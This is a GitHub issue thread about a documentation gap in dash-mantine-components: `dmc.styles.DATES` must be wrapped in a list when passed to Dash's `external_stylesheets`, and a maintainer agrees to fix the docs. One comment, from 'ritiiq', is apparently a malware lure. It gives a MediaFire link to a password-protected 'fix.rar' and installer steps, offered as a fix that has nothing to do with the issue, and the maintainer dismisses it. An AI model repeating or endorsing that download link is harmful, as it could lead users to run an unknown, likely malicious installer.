### ISSUE TITLE
[DOCS] - Individual dmc.styles needs to be wrapped in a list

### ISSUE THREAD

**Issue by celia-lm** [snehilvj/dash-mantine-components#297]
I tried
```
dash._dash_renderer._set_react_version("18.2.0")
app = Dash(__name__, external_stylesheets=dmc.styles.DATES)
```
Before that, my app was working fine. When I added it, I got this screen:
<img width="1257" alt="Screenshot 2024-08-26 at 16 53 32" src="https://github.com/user-attachments/assets/386b07cc-a65f-46f2-97af-ec7b13002630">

This happens because Dash requires `external_stylesheets` to be a list and `dmc.styles.DATES` is a string. I understand that it's a string because, if the developer wants to specify multiple styles, the resulting object should be a list of strings, not a list of lists. 

The solution is to wrap `dmc.styles.DATES` in a list:
```
dash._dash_renderer._set_react_version("18.2.0")
app = Dash(__name__, external_stylesheets=[dmc.styles.DATES])
```
However, the docs don't specify that and I believe it would be helpful if they did :) 

Current doc information:
<img width="959" alt="Screenshot 2024-08-26 at 17 00 17" src="https://github.com/user-attachments/assets/5d48360d-f887-4d15-bf3d-12465c49e1fd">
https://www.dash-mantine-components.com/components/datesprovider

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AnnMarieW** [comment]
@celia-lm 
Thanks for reporting, I’ll make an update to the docs.  It’s shown correctly on the [Getting Started]( https://www.dash-mantine-components.com/getting-started) page, but the notes in each section need updating.

@ritiiq I have not idea what your comment applies to but it’s not this issue.
